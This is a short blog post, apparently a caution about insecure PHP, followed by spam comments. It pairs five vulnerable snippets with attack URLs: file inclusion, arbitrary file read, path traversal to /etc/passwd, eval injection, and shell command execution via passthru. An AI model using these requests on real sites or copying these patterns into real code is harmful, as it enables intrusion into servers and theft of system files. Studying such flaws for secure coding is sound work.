Fatal Error writing php scripts
Posted by newbiekidApr 17
======case 1======
[scripts]
$page = $_GET[page];
include($page);
[attack]
http://victim.com/file.php?page=[evil scripts]
======case 2======
[Scripts]
Header( “Content-Type: Application/Octet-Stream” );
header( “Content-Length: ” . filesize($_GET['file'] ) );
header( “Content-Disposition: inline; filename=\”$_GET[file]\”");
readfile($_GET['file'] );
[attack]
http://victim.com/file.php?file=index.php
=======case 3=======
[scripts]
$fp = fopen(“/path/{$_GET['filename']}.txt”, ‘r’);
[attack]
http://victim.com/file.php?filename=../../../etc/passwd
======case 4======
[scripts]
eval($_GET[ev]);
[attack]
http://victim.com/file.php?ev=include($_GET[vegetoo]);&vegetoo=[evil code]
==========case 5==========
[scripts]
passthru($_GET[cmd]);
[attack]
http://victim.com/file.php?cmd=ls -al
9 comments
Comment by German Moreida on February 23, 2011 at 3:48 am
Whoa ! Which is one Amazing Page ! Many thanks Much, When i just Saved like a favorite your website, Hope that you’ll develop extra material in this way.
Comment by Thai Massage on February 23, 2011 at 7:45 am
I’m usually to blogging and i actually recognize your content. The article has really peaks my interest. I’m going to bookmark your website and hold checking for brand spanking new information.
Comment by x pole sport on February 23, 2011 at 8:27 am
Sorry for the huge review, but I’m really loving the new Zune, and hope this, as well as the excellent reviews some other people have written, will help you decide if it’s the right choice for you.
Comment by Darci Sterling on February 24, 2011 at 8:34 pm
It’s really a great and useful piece of info. I’m happy that you shared this useful info with us. Please stay us informed like this. Thanks for sharing.
Comment by jeux gratuits on March 4, 2011 at 12:00 am
It’s exceptionally communicative posting, actualy i’m new in the speciality problem, so this longhand help me much enlarge my knowledge.
Comment by free download the lincoln lawyer movie on March 19, 2011 at 4:26 am
Took me time to study all the feedback, but I seriously appreciated the submit. It proved to grow to be Fairly useful to me and I?m positive to all the commenters right right here It?s often terrific once you can not just be informed, but in addition entertained I?m positive you had enjoyable writing this submit.
Comment by Free Macbook Pro on April 13, 2011 at 6:41 pm
That is really attention-grabbing, You’re an overly skilled blogger. I have joined your feed and look ahead to in quest of more of your wonderful post. Also, I have shared your site in my social networks!
Comment by local mobile monopoly review on April 14, 2011 at 8:47 am
Wow! This can be one particular of the most beneficial blogs We have ever arrive across on this subject. Actually Great. I’m also an expert in this topic so I can understand your hard work.
Comment by kursi rotan sintetis on April 14, 2011 at 8:51 am
Wow! It is like you understand my mind! You appear to understand a great deal about this, like you wrote the guide in it or something. I think that you simply could do with some images to drive the content material home a bit, but other than that, this is excellent weblog. An excellent study. I will definitely be again.